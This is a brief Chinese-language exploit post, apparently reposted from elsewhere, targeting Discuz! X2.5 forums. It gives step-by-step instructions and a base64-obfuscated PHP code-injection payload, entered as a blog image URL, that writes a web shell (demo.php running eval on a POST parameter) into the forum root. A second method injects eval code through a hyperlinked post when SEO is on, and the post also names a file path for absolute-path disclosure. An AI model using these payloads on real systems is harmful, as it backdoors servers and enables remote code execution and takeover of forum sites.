source/plugin/myrepeats/table/table_myrepeats.php  爆绝对路径


Discuz!X2.5Release20120407影响版本有：20120407，beta，rc                                   1.注册任意账户 2.登陆用户，发表blog日志（注意是日志） 3.添加图片，选择网络图片，地址{${fputs(fopen(base64_decode(ZGVtby5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}} 4.访问日志，论坛根目录下生成demo.php，一句发密码c

转载：

方法1：

1.注册任意账户

2.登陆用户，发表blog日志（注意是日志

3.添加图片，选择网络图片，地址
{${fputs(fopen(base64_decode(ZGVtby5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}}
4..访问日志，论坛根目录下生成demo.php，一句话密码C

{${fputs(fopen(base64_decode(ZGVtby5waHA),w),base64_decode
(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}}


方法2：

这个必须是要开启seo

随便发个贴子，内容

${${eval_r(chr(112).chr(104).chr(112).chr(105).chr(110).chr(102).chr(111).chr(40).chr(41).chr(59))
然后给他加上任意超链接，发布即可

